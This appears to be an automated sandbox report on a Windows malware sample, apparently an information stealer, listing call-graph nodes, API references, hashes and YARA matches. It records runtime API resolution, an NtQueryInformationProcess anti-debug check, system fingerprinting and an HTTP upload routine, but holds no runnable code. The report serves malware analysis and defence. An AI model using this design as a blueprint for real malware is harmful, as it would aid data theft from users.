API calls 26682->26683 26684 2b408a 26683->26684 26685 2b4a60 2 API calls 26684->26685 26686 2b40a0 26685->26686 26687 2b4a60 2 API calls 26686->26687 26688 2b40b6 26687->26688 26689 2b4a60 2 API calls 26688->26689 26690 2b40cc 26689->26690 26691 2b4a60 2 API calls 26690->26691 26692 2b40e2 26691->26692 26693 2b4a60 2 API calls 26692->26693 26694 2b40f8 26693->26694 26695 2b4a60 2 API calls 26694->26695 26696 2b4111 26695->26696 26697 2b4a60 2 API calls 26696->26697 26698 2b4127 26697->26698 26699 2b4a60 2 API calls 26698->26699 26700 2b413d 26699->26700 26701 2b4a60 2 API calls 26700->26701 26702 2b4153 26701->26702 26703 2b4a60 2 API calls 26702->26703 26704 2b4169 26703->26704 26705 2b4a60 2 API calls 26704->26705 26706 2b417f 26705->26706 26707 2b4a60 2 API calls 26706->26707 26708 2b4198 26707->26708 26709 2b4a60 2 API calls 26708->26709 26710 2b41ae 26709->26710 26711 2b4a60 2 API calls 26710->26711 26712 2b41c4 26711->26712 26713 2b4a60 2 API calls 26712->26713 26714 2b41da 26713->26714 26715 2b4a60 2 API calls 26714->26715 26716 2b41f0 26715->26716 26717 2b4a60 2 API calls 26716->26717 26718 2b4206 26717->26718 26719 2b4a60 2 API calls 26718->26719 26720 2b421f 26719->26720 26721 2b4a60 2 API calls 26720->26721 26722 2b4235 26721->26722 26723 2b4a60 2 API calls 26722->26723 26724 2b424b 26723->26724 26725 2b4a60 2 API calls 26724->26725 26726 2b4261 26725->26726 26727 2b4a60 2 API calls 26726->26727 26728 2b4277 26727->26728 26729 2b4a60 2 API calls 26728->26729 26730 2b428d 26729->26730 26731 2b4a60 2 API calls 26730->26731 26732 2b42a6 26731->26732 26733 2b4a60 2 API calls 26732->26733 26734 2b42bc 26733->26734 26735 2b4a60 2 API calls 26734->26735 26736 2b42d2 26735->26736 26737 2b4a60 2 API calls 26736->26737 26738 2b42e8 26737->26738 26739 2b4a60 2 API calls 26738->26739 26740 2b42fe 26739->26740 26741 2b4a60 2 API calls 26740->26741 26742 2b4314 26741->26742 26743 2b4a60 2 API calls 26742->26743 26744 2b432d 26743->26744 26745 2b4a60 2 API calls 
26744->26745 26746 2b4343 26745->26746 26747 2b4a60 2 API calls 26746->26747 26748 2b4359 26747->26748 26749 2b4a60 2 API calls 26748->26749 26750 2b436f 26749->26750 26751 2b4a60 2 API calls 26750->26751 26752 2b4385 26751->26752 26753 2b4a60 2 API calls 26752->26753 26754 2b439b 26753->26754 26755 2b4a60 2 API calls 26754->26755 26756 2b43b4 26755->26756 26757 2b4a60 2 API calls 26756->26757 26758 2b43ca 26757->26758 26759 2b4a60 2 API calls 26758->26759 26760 2b43e0 26759->26760 26761 2b4a60 2 API calls 26760->26761 26762 2b43f6 26761->26762 26763 2b4a60 2 API calls 26762->26763 26764 2b440c 26763->26764 26765 2b4a60 2 API calls 26764->26765 26766 2b4422 26765->26766 26767 2b4a60 2 API calls 26766->26767 26768 2b443b 26767->26768 26769 2b4a60 2 API calls 26768->26769 26770 2b4451 26769->26770 26771 2b4a60 2 API calls 26770->26771 26772 2b4467 26771->26772 26773 2b4a60 2 API calls 26772->26773 26774 2b447d 26773->26774 26775 2b4a60 2 API calls 26774->26775 26776 2b4493 26775->26776 26777 2b4a60 2 API calls 26776->26777 26778 2b44a9 26777->26778 26779 2b4a60 2 API calls 26778->26779 26780 2b44c2 26779->26780 26781 2b4a60 2 API calls 26780->26781 26782 2b44d8 26781->26782 26783 2b4a60 2 API calls 26782->26783 26784 2b44ee 26783->26784 26785 2b4a60 2 API calls 26784->26785 26786 2b4504 26785->26786 26787 2b4a60 2 API calls 26786->26787 26788 2b451a 26787->26788 26789 2b4a60 2 API calls 26788->26789 26790 2b4530 26789->26790 26791 2b4a60 2 API calls 26790->26791 26792 2b4549 26791->26792 26793 2b4a60 2 API calls 26792->26793 26794 2b455f 26793->26794 26795 2b4a60 2 API calls 26794->26795 26796 2b4575 26795->26796 26797 2b4a60 2 API calls 26796->26797 26798 2b458b 26797->26798 26799 2b4a60 2 API calls 26798->26799 26800 2b45a1 26799->26800 26801 2b4a60 2 API calls 26800->26801 26802 2b45b7 26801->26802 26803 2b4a60 2 API calls 26802->26803 26804 2b45d0 26803->26804 26805 2b4a60 2 API calls 26804->26805 26806 2b45e6 26805->26806 26807 2b4a60 2 API calls 26806->26807 
26808 2b45fc 26807->26808 26809 2b4a60 2 API calls 26808->26809 26810 2b4612 26809->26810 26811 2b4a60 2 API calls 26810->26811 26812 2b4628 26811->26812 26813 2b4a60 2 API calls 26812->26813 26814 2b463e 26813->26814 26815 2b4a60 2 API calls 26814->26815 26816 2b4657 26815->26816 26817 2b4a60 2 API calls 26816->26817 26818 2b466d 26817->26818 26819 2b4a60 2 API calls 26818->26819 26820 2b4683 26819->26820 26821 2b4a60 2 API calls 26820->26821 26822 2b4699 26821->26822 26823 2b4a60 2 API calls 26822->26823 26824 2b46af 26823->26824 26825 2b4a60 2 API calls 26824->26825 26826 2b46c5 26825->26826 26827 2b4a60 2 API calls 26826->26827 26828 2b46de 26827->26828 26829 2b4a60 2 API calls 26828->26829 26830 2b46f4 26829->26830 26831 2b4a60 2 API calls 26830->26831 26832 2b470a 26831->26832 26833 2b4a60 2 API calls 26832->26833 26834 2b4720 26833->26834 26835 2b4a60 2 API calls 26834->26835 26836 2b4736 26835->26836 26837 2b4a60 2 API calls 26836->26837 26838 2b474c 26837->26838 26839 2b4a60 2 API calls 26838->26839 26840 2b4765 26839->26840 26841 2b4a60 2 API calls 26840->26841 26842 2b477b 26841->26842 26843 2b4a60 2 API calls 26842->26843 26844 2b4791 26843->26844 26845 2b4a60 2 API calls 26844->26845 26846 2b47a7 26845->26846 26847 2b4a60 2 API calls 26846->26847 26848 2b47bd 26847->26848 26849 2b4a60 2 API calls 26848->26849 26850 2b47d3 26849->26850 26851 2b4a60 2 API calls 26850->26851 26852 2b47ec 26851->26852 26853 2b4a60 2 API calls 26852->26853 26854 2b4802 26853->26854 26855 2b4a60 2 API calls 26854->26855 26856 2b4818 26855->26856 26857 2b4a60 2 API calls 26856->26857 26858 2b482e 26857->26858 26859 2b4a60 2 API calls 26858->26859 26860 2b4844 26859->26860 26861 2b4a60 2 API calls 26860->26861 26862 2b485a 26861->26862 26863 2b4a60 2 API calls 26862->26863 26864 2b4873 26863->26864 26865 2b4a60 2 API calls 26864->26865 26866 2b4889 26865->26866 26867 2b4a60 2 API calls 26866->26867 26868 2b489f 26867->26868 26869 2b4a60 2 API calls 26868->26869 26870 2b48b5 
26869->26870 26871 2b4a60 2 API calls 26870->26871 26872 2b48cb 26871->26872 26873 2b4a60 2 API calls 26872->26873 26874 2b48e1 26873->26874 26875 2b4a60 2 API calls 26874->26875 26876 2b48fa 26875->26876 26877 2b4a60 2 API calls 26876->26877 26878 2b4910 26877->26878 26879 2b4a60 2 API calls 26878->26879 26880 2b4926 26879->26880 26881 2b4a60 2 API calls 26880->26881 26882 2b493c 26881->26882 26883 2b4a60 2 API calls 26882->26883 26884 2b4952 26883->26884 26885 2b4a60 2 API calls 26884->26885 26886 2b4968 26885->26886 26887 2b4a60 2 API calls 26886->26887 26888 2b4981 26887->26888 26889 2b4a60 2 API calls 26888->26889 26890 2b4997 26889->26890 26891 2b4a60 2 API calls 26890->26891 26892 2b49ad 26891->26892 26893 2b4a60 2 API calls 26892->26893 26894 2b49c3 26893->26894 26895 2b4a60 2 API calls 26894->26895 26896 2b49d9 26895->26896 26897 2b4a60 2 API calls 26896->26897 26898 2b49ef 26897->26898 26899 2b4a60 2 API calls 26898->26899 26900 2b4a08 26899->26900 26901 2b4a60 2 API calls 26900->26901 26902 2b4a1e 26901->26902 26903 2b4a60 2 API calls 26902->26903 26904 2b4a34 26903->26904 26905 2b4a60 2 API calls 26904->26905 26906 2b4a4a 26905->26906 26907 2d66e0 26906->26907 26908 2d66ed 43 API calls 26907->26908 26909 2d6afe 8 API calls 26907->26909 26908->26909 26910 2d6c08 26909->26910 26911 2d6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26909->26911 26912 2d6c15 8 API calls 26910->26912 26913 2d6cd2 26910->26913 26911->26910 26912->26913 26914 2d6d4f 26913->26914 26915 2d6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26913->26915 26916 2d6d5c 6 API calls 26914->26916 26917 2d6de9 26914->26917 26915->26914 26916->26917 26918 2d6df6 12 API calls 26917->26918 26919 2d6f10 26917->26919 26918->26919 26920 2d6f8d 26919->26920 26921 2d6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26919->26921 26922 2d6f96 GetProcAddress GetProcAddress 26920->26922 26923 2d6fc1 
26920->26923 26921->26920 26922->26923 26924 2d6fca GetProcAddress GetProcAddress 26923->26924 26925 2d6ff5 26923->26925 26924->26925 26926 2d70ed 26925->26926 26927 2d7002 10 API calls 26925->26927 26928 2d70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26926->26928 26929 2d7152 26926->26929 26927->26926 26928->26929 26930 2d716e 26929->26930 26931 2d715b GetProcAddress 26929->26931 26932 2d7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26930->26932 26933 2d051f 26930->26933 26931->26930 26932->26933 26934 2b1530 26933->26934 27243 2b1610 26934->27243 26936 2b153b 26937 2b1555 lstrcpy 26936->26937 26938 2b155d 26936->26938 26937->26938 26939 2b1577 lstrcpy 26938->26939 26940 2b157f 26938->26940 26939->26940 26941 2b1599 lstrcpy 26940->26941 26942 2b15a1 26940->26942 26941->26942 26943 2b1605 26942->26943 26944 2b15fd lstrcpy 26942->26944 26945 2cf1b0 lstrlen 26943->26945 26944->26943 26946 2cf1e4 26945->26946 26947 2cf1eb lstrcpy 26946->26947 26948 2cf1f7 lstrlen 26946->26948 26947->26948 26949 2cf208 26948->26949 26950 2cf20f lstrcpy 26949->26950 26951 2cf21b lstrlen 26949->26951 26950->26951 26952 2cf22c 26951->26952 26953 2cf233 lstrcpy 26952->26953 26954 2cf23f 26952->26954 26953->26954 26955 2cf258 lstrcpy 26954->26955 26956 2cf264 26954->26956 26955->26956 26957 2cf286 lstrcpy 26956->26957 26958 2cf292 26956->26958 26957->26958 26959 2cf2ba lstrcpy 26958->26959 26960 2cf2c6 26958->26960 26959->26960 26961 2cf2ea lstrcpy 26960->26961 27002 2cf300 26960->27002 26961->27002 26962 2cf30c lstrlen 26962->27002 26963 2cf4b9 lstrcpy 26963->27002 26964 2cf3a1 lstrcpy 26964->27002 26965 2cf3c5 lstrcpy 26965->27002 26966 2cf4e8 lstrcpy 27028 2cf4f0 26966->27028 26967 2cf479 lstrcpy 26967->27002 26968 2cf59c lstrcpy 26968->27028 26969 2cf70f StrCmpCA 26974 2cfe8e 26969->26974 26969->27002 26970 2cf616 StrCmpCA 26970->26969 26970->27028 26971 2cfa29 StrCmpCA 26981 2cfe2b 26971->26981 26971->27002 26972 2cf73e lstrlen 26972->27002 26973 
2cfead lstrlen 26989 2cfec7 26973->26989 26974->26973 26976 2cfea5 lstrcpy 26974->26976 26975 2cfd4d StrCmpCA 26978 2cfd60 Sleep 26975->26978 26986 2cfd75 26975->26986 26976->26973 26977 2cfa58 lstrlen 26977->27002 26978->27002 26979 2cf64a lstrcpy 26979->27028 26980 2b1530 8 API calls 26980->27028 26982 2cfe4a lstrlen 26981->26982 26985 2cfe42 lstrcpy 26981->26985 26995 2cfe64 26982->26995 26983 2cee90 28 API calls 26983->27028 26984 2cf89e lstrcpy 26984->27002 26985->26982 26987 2cfd94 lstrlen 26986->26987 26991 2cfd8c lstrcpy 26986->26991 26997 2cfdae 26987->26997 26988 2cf76f lstrcpy 26988->27002 26990 2cfee7 lstrlen 26989->26990 26993 2cfedf lstrcpy 26989->26993 27004 2cff01 26990->27004 26991->26987 26992 2cfbb8 lstrcpy 26992->27002 26993->26990 26994 2cfa89 lstrcpy 26994->27002 26996 2cfdce lstrlen 26995->26996 26999 2cfe7c lstrcpy 26995->26999 27003 2cfde8 26996->27003 26997->26996 27008 2cfdc6 lstrcpy 26997->27008 26998 2cf791 lstrcpy 26998->27002 26999->26996 27001 2cf8cd lstrcpy 27001->27028 27002->26962 27002->26963 27002->26964 27002->26965 27002->26966 27002->26967 27002->26969 27002->26971 27002->26972 27002->26975 27002->26977 27002->26984 27002->26988 27002->26992 27002->26994 27002->26998 27002->27001 27007 2cfaab lstrcpy 27002->27007 27009 2b1530 8 API calls 27002->27009 27010 2cfbe7 lstrcpy 27002->27010 27013 2cee90 28 API calls 27002->27013 27018 2cf7e2 lstrcpy 27002->27018 27021 2cfafc lstrcpy 27002->27021 27002->27028 27014 2cfe08 27003->27014 27016 2cfe00 lstrcpy 27003->27016 27005 2cff21 27004->27005 27011 2cff19 lstrcpy 27004->27011 27012 2b1610 4 API calls 27005->27012 27006 2cf698 lstrcpy 27006->27028 27007->27002 27008->26996 27009->27002 27010->27028 27011->27005 27029 2cfe13 27012->27029 27013->27002 27017 2b1610 4 API calls 27014->27017 27015 2cefb0 35 API calls 27015->27028 27016->27014 27017->27029 27018->27002 27019 2cf924 lstrcpy 27019->27028 27020 2cf99e StrCmpCA 27020->26971 27020->27028 27021->27002 27022 2cfc3e lstrcpy 
27022->27028 27023 2cfcb8 StrCmpCA 27023->26975 27023->27028 27024 2cf9cb lstrcpy 27024->27028 27025 2cfce9 lstrcpy 27025->27028 27026 2cfa19 lstrcpy 27026->27028 27027 2cfd3a lstrcpy 27027->27028 27028->26968 27028->26970 27028->26971 27028->26975 27028->26979 27028->26980 27028->26983 27028->27002 27028->27006 27028->27015 27028->27019 27028->27020 27028->27022 27028->27023 27028->27024 27028->27025 27028->27026 27028->27027 27029->26053 27031 2d278c GetVolumeInformationA 27030->27031 27032 2d2785 27030->27032 27033 2d27ec GetProcessHeap RtlAllocateHeap 27031->27033 27032->27031 27035 2d2826 wsprintfA 27033->27035 27036 2d2822 27033->27036 27035->27036 27253 2d71e0 27036->27253 27040 2b4c70 27039->27040 27041 2b4c85 27040->27041 27042 2b4c7d lstrcpy 27040->27042 27257 2b4bc0 27041->27257 27042->27041 27044 2b4c90 27045 2b4ccc lstrcpy 27044->27045 27046 2b4cd8 27044->27046 27045->27046 27047 2b4cff lstrcpy 27046->27047 27048 2b4d0b 27046->27048 27047->27048 27049 2b4d2f lstrcpy 27048->27049 27050 2b4d3b 27048->27050 27049->27050 27051 2b4d6d lstrcpy 27050->27051 27052 2b4d79 27050->27052 27051->27052 27053 2b4dac InternetOpenA StrCmpCA 27052->27053 27054 2b4da0 lstrcpy 27052->27054 27055 2b4de0 27053->27055 27054->27053 27056 2b54b8 InternetCloseHandle CryptStringToBinaryA 27055->27056 27261 2d3e70 27055->27261 27058 2b54e8 LocalAlloc 27056->27058 27074 2b55d8 27056->27074 27059 2b54ff CryptStringToBinaryA 27058->27059 27058->27074 27060 2b5529 lstrlen 27059->27060 27061 2b5517 LocalFree 27059->27061 27062 2b553d 27060->27062 27061->27074 27064 2b5563 lstrlen 27062->27064 27065 2b5557 lstrcpy 27062->27065 27063 2b4dfa 27066 2b4e23 lstrcpy lstrcat 27063->27066 27067 2b4e38 27063->27067 27069 2b557d 27064->27069 27065->27064 27066->27067 27068 2b4e5a lstrcpy 27067->27068 27070 2b4e62 27067->27070 27068->27070 27071 2b558f lstrcpy lstrcat 27069->27071 27072 2b55a2 27069->27072 27073 2b4e71 lstrlen 27070->27073 27071->27072 27075 2b55d1 27072->27075 27077 2b55c9 
lstrcpy 27072->27077 27076 2b4e89 27073->27076 27074->26082 27075->27074 27078 2b4e95 lstrcpy lstrcat 27076->27078 27079 2b4eac 27076->27079 27077->27075 27078->27079 27080 2b4ed5 27079->27080 27081 2b4ecd lstrcpy 27079->27081 27082 2b4edc lstrlen 27080->27082 27081->27080 27083 2b4ef2 27082->27083 27084 2b4efe lstrcpy lstrcat 27083->27084 27085 2b4f15 27083->27085 27084->27085 27086 2b4f36 lstrcpy 27085->27086 27087 2b4f3e 27085->27087 27086->27087 27088 2b4f65 lstrcpy lstrcat 27087->27088 27089 2b4f7b 27087->27089 27088->27089 27090 2b4fa4 27089->27090 27091 2b4f9c lstrcpy 27089->27091 27092 2b4fab lstrlen 27090->27092 27091->27090 27093 2b4fc1 27092->27093 27094 2b4fcd lstrcpy lstrcat 27093->27094 27095 2b4fe4 27093->27095 27094->27095 27096 2b500d 27095->27096 27097 2b5005 lstrcpy 27095->27097 27098 2b5014 lstrlen 27096->27098 27097->27096 27099 2b502a 27098->27099 27100 2b5036 lstrcpy lstrcat 27099->27100 27101 2b504d 27099->27101 27100->27101 27102 2b5079 27101->27102 27103 2b5071 lstrcpy 27101->27103 27104 2b5080 lstrlen 27102->27104 27103->27102 27105 2b509b 27104->27105 27106 2b50ac lstrcpy lstrcat 27105->27106 27107 2b50bc 27105->27107 27106->27107 27108 2b50da lstrcpy lstrcat 27107->27108 27109 2b50ed 27107->27109 27108->27109 27110 2b510b lstrcpy 27109->27110 27111 2b5113 27109->27111 27110->27111 27112 2b5121 InternetConnectA 27111->27112 27112->27056 27113 2b5150 HttpOpenRequestA 27112->27113 27114 2b518b 27113->27114 27115 2b54b1 InternetCloseHandle 27113->27115 27268 2d7310 lstrlen 27114->27268 27115->27056 27119 2b51a4 27276 2d72c0 27119->27276 27122 2d7280 lstrcpy 27123 2b51c0 27122->27123 27124 2d7310 3 API calls 27123->27124 27125 2b51d5 27124->27125 27126 2d7280 lstrcpy 27125->27126 27127 2b51de 27126->27127 27128 2d7310 3 API calls 27127->27128 27129 2b51f4 27128->27129 27130 2d7280 lstrcpy 27129->27130 27131 2b51fd 27130->27131 27132 2d7310 3 API calls 27131->27132 27133 2b5213 27132->27133 27134 2d7280 lstrcpy 27133->27134 27135 2b521c 
27134->27135 27136 2d7310 3 API calls 27135->27136 27137 2b5231 27136->27137 27138 2d7280 lstrcpy 27137->27138 27139 2b523a 27138->27139 27140 2d72c0 2 API calls 27139->27140 27141 2b524d 27140->27141 27142 2d7280 lstrcpy 27141->27142 27143 2b5256 27142->27143 27144 2d7310 3 API calls 27143->27144 27145 2b526b 27144->27145 27146 2d7280 lstrcpy 27145->27146 27147 2b5274 27146->27147 27148 2d7310 3 API calls 27147->27148 27149 2b5289 27148->27149 27150 2d7280 lstrcpy 27149->27150 27151 2b5292 27150->27151 27152 2d72c0 2 API calls 27151->27152 27153 2b52a5 27152->27153 27154 2d7280 lstrcpy 27153->27154 27155 2b52ae 27154->27155 27156 2d7310 3 API calls 27155->27156 27157 2b52c3 27156->27157 27158 2d7280 lstrcpy 27157->27158 27159 2b52cc 27158->27159 27160 2d7310 3 API calls 27159->27160 27161 2b52e2 27160->27161 27162 2d7280 lstrcpy 27161->27162 27163 2b52eb 27162->27163 27164 2d7310 3 API calls 27163->27164 27165 2b5301 27164->27165 27166 2d7280 lstrcpy 27165->27166 27167 2b530a 27166->27167 27168 2d7310 3 API calls 27167->27168 27169 2b531f 27168->27169 27170 2d7280 lstrcpy 27169->27170 27171 2b5328 27170->27171 27172 2d72c0 2 API calls 27171->27172 27173 2b533b 27172->27173 27174 2d7280 lstrcpy 27173->27174 27175 2b5344 27174->27175 27176 2b537c 27175->27176 27177 2b5370 lstrcpy 27175->27177 27178 2d72c0 2 API calls 27176->27178 27177->27176 27179 2b538a 27178->27179 27180 2d72c0 2 API calls 27179->27180 27181 2b5397 27180->27181 27182 2d7280 lstrcpy 27181->27182 27183 2b53a1 27182->27183 27184 2b53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27183->27184 27185 2b549c InternetCloseHandle 27184->27185 27189 2b53f2 27184->27189 27187 2b54ae 27185->27187 27186 2b53fd lstrlen 27186->27189 27187->27115 27188 2b542e lstrcpy lstrcat 27188->27189 27189->27185 27189->27186 27189->27188 27190 2b5473 27189->27190 27191 2b546b lstrcpy 27189->27191 27192 2b547a InternetReadFile 27190->27192 27191->27190 27192->27185 27192->27189 27194 2c8cc6 ExitProcess 27193->27194 
27209 2c8ccd 27193->27209 27195 2c8ee2 27195->26084 27196 2c8e6f StrCmpCA 27196->27209 27197 2c8e88 lstrlen 27197->27209 27198 2c8d84 StrCmpCA 27198->27209 27199 2c8da4 StrCmpCA 27199->27209 27200 2c8d06 lstrlen 27200->27209 27201 2c8dbd StrCmpCA 27201->27209 27202 2c8ddd StrCmpCA 27202->27209 27203 2c8dfd StrCmpCA 27203->27209 27204 2c8e1d StrCmpCA 27204->27209 27205 2c8e3d StrCmpCA 27205->27209 27206 2c8d5a lstrlen 27206->27209 27207 2c8e56 StrCmpCA 27207->27209 27208 2c8d30 lstrlen 27208->27209 27209->27195 27209->27196 27209->27197 27209->27198 27209->27199 27209->27200 27209->27201 27209->27202 27209->27203 27209->27204 27209->27205 27209->27206 27209->27207 27209->27208 27210 2c8ebb lstrcpy 27209->27210 27210->27209 27211->26090 27212->26092 27213->26098 27214->26100 27215->26106 27216->26108 27217->26114 27218->26118 27219->26124 27220->26126 27221->26130 27222->26144 27223->26148 27224->26147 27225->26143 27226->26147 27227->26163 27228->26150 27229->26153 27230->26154 27231->26160 27232->26165 27233->26167 27234->26174 27235->26181 27236->26201 27237->26205 27238->26204 27239->26199 27240->26204 27241->26214 27244 2b161f 27243->27244 27245 2b162b lstrcpy 27244->27245 27246 2b1633 27244->27246 27245->27246 27247 2b164d lstrcpy 27246->27247 27248 2b1655 27246->27248 27247->27248 27249 2b166f lstrcpy 27248->27249 27250 2b1677 27248->27250 27249->27250 27251 2b1699 27250->27251 27252 2b1691 lstrcpy 27250->27252 27251->26936 27252->27251 27254 2d71e6 27253->27254 27255 2d71fc lstrcpy 27254->27255 27256 2d2860 27254->27256 27255->27256 27256->26079 27258 2b4bd0 27257->27258 27258->27258 27259 2b4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27258->27259 27260 2b4c41 27259->27260 27260->27044 27262 2d3e83 27261->27262 27263 2d3e9f lstrcpy 27262->27263 27264 2d3eab 27262->27264 27263->27264 27265 2d3ecd lstrcpy 27264->27265 27266 2d3ed5 GetSystemTime 27264->27266 27265->27266 27267 2d3ef3 27266->27267 27267->27063 27270 2d732d 27268->27270 27269 
2b519b 27272 2d7280 27269->27272 27270->27269 27271 2d733d lstrcpy lstrcat 27270->27271 27271->27269 27273 2d728c 27272->27273 27274 2d72b4 27273->27274 27275 2d72ac lstrcpy 27273->27275 27274->27119 27275->27274 27278 2d72dc 27276->27278 27277 2b51b7 27277->27122 27278->27277 27279 2d72ed lstrcpy lstrcat 27278->27279 27279->27277 27309 2d31f0 GetSystemInfo wsprintfA 27289 2ce049 147 API calls 27338 2c8615 48 API calls 27331 2c8615 49 API calls 27300 2d3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27339 2d33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27306 2c3959 244 API calls 27310 2c01d9 126 API calls 27301 2d2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27290 2d2853 lstrcpy
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 002B4C7F
• lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4CD2
• lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D05
• lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D35
• lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D73
• lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4DA6
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002B4DB6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: b53443bcc8ed07b0e00f7229ac4b4136b3ce4325cc37999fe8cedfb7f16e64e1
                                  • Instruction ID: cf47ad0ecea7aeaf2435d52180f2dde9a14fe14525ea155e37487d1662c0f978
                                  • Opcode Fuzzy Hash: b53443bcc8ed07b0e00f7229ac4b4136b3ce4325cc37999fe8cedfb7f16e64e1
                                  • Instruction Fuzzy Hash: 0C529E319216169BDB21EFA4DC89BEEB7B9AF04380F144425F845EB252DB34EC56CF90

                                  Control-flow Graph (text export of the graph view: each node is "id start-end" followed by the APIs the block calls, "call addr" for an internal subcall and "* n" for a call repeated n times; "a->b" is an edge; the executed / not executed colouring of the graph view is not preserved in this export)
                                  control_flow_graph 2125 2d6390-2d63bd GetPEB 2126 2d65c3-2d6623 LoadLibraryA * 5 2125->2126 2127 2d63c3-2d65be call 2d62f0 GetProcAddress * 20 2125->2127 2129 2d6638-2d663f 2126->2129 2130 2d6625-2d6633 GetProcAddress 2126->2130 2127->2126 2131 2d666c-2d6673 2129->2131 2132 2d6641-2d6667 GetProcAddress * 2 2129->2132 2130->2129 2134 2d6688-2d668f 2131->2134 2135 2d6675-2d6683 GetProcAddress 2131->2135 2132->2131 2136 2d66a4-2d66ab 2134->2136 2137 2d6691-2d669f GetProcAddress 2134->2137 2135->2134 2139 2d66ad-2d66d2 GetProcAddress * 2 2136->2139 2140 2d66d7-2d66da 2136->2140 2137->2136 2139->2140
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 002D63E9
                                  • GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 002D6402
                                  • GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 002D641A
                                  • GetProcAddress.KERNEL32(74DD0000,011C2380), ref: 002D6432
                                  • GetProcAddress.KERNEL32(74DD0000,011C90B8), ref: 002D644B
                                  • GetProcAddress.KERNEL32(74DD0000,011B56B0), ref: 002D6463
                                  • GetProcAddress.KERNEL32(74DD0000,011B5830), ref: 002D647B
                                  • GetProcAddress.KERNEL32(74DD0000,011C22A8), ref: 002D6494
                                  • GetProcAddress.KERNEL32(74DD0000,011C23C8), ref: 002D64AC
                                  • GetProcAddress.KERNEL32(74DD0000,011C23E0), ref: 002D64C4
                                  • GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 002D64DD
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 002D64F5
                                  • GetProcAddress.KERNEL32(74DD0000,011C24E8), ref: 002D650D
                                  • GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 002D6526
                                  • GetProcAddress.KERNEL32(74DD0000,011B56F0), ref: 002D653E
                                  • GetProcAddress.KERNEL32(74DD0000,011C2218), ref: 002D6556
                                  • GetProcAddress.KERNEL32(74DD0000,011C2230), ref: 002D656F
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A90), ref: 002D6587
                                  • GetProcAddress.KERNEL32(74DD0000,011C22D8), ref: 002D659F
                                  • GetProcAddress.KERNEL32(74DD0000,011B5770), ref: 002D65B8
                                  • LoadLibraryA.KERNEL32(011C2578,?,?,?,002D1C03), ref: 002D65C9
                                  • LoadLibraryA.KERNEL32(011C25C0,?,?,?,002D1C03), ref: 002D65DB
                                  • LoadLibraryA.KERNEL32(011C2530,?,?,?,002D1C03), ref: 002D65ED
                                  • LoadLibraryA.KERNEL32(011C2548,?,?,?,002D1C03), ref: 002D65FE
                                  • LoadLibraryA.KERNEL32(011C2590,?,?,?,002D1C03), ref: 002D6610
                                  • GetProcAddress.KERNEL32(75A70000,011C25D8), ref: 002D662D
                                  • GetProcAddress.KERNEL32(75290000,011C2560), ref: 002D6649
                                  • GetProcAddress.KERNEL32(75290000,011C2518), ref: 002D6661
                                  • GetProcAddress.KERNEL32(75BD0000,011C25A8), ref: 002D667D
                                  • GetProcAddress.KERNEL32(75450000,011B5790), ref: 002D6699
                                  • GetProcAddress.KERNEL32(76E90000,011C8F48), ref: 002D66B5
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 002D66CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 002D66C1
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: ab3d3f6e3abc0d88bb39db51884d8ed335e02025d4e09892fc4db953a3e9de3c
                                  • Instruction ID: ad2f854b06a7c6d599a56f56078ca62b6da362653e7164c3610c9d1add50af58
                                  • Opcode Fuzzy Hash: ab3d3f6e3abc0d88bb39db51884d8ed335e02025d4e09892fc4db953a3e9de3c
                                  • Instruction Fuzzy Hash: 86A164F59112819FDB54DF65EDC8A2637B9F788240380863DE919CB3A2DB34AD00DF68

                                  Control-flow Graph (text export of the graph view: each node is "id start-end" followed by the APIs the block calls, "call addr" for an internal subcall and "* n" for a call repeated n times; "a->b" is an edge; the executed / not executed colouring of the graph view is not preserved in this export)
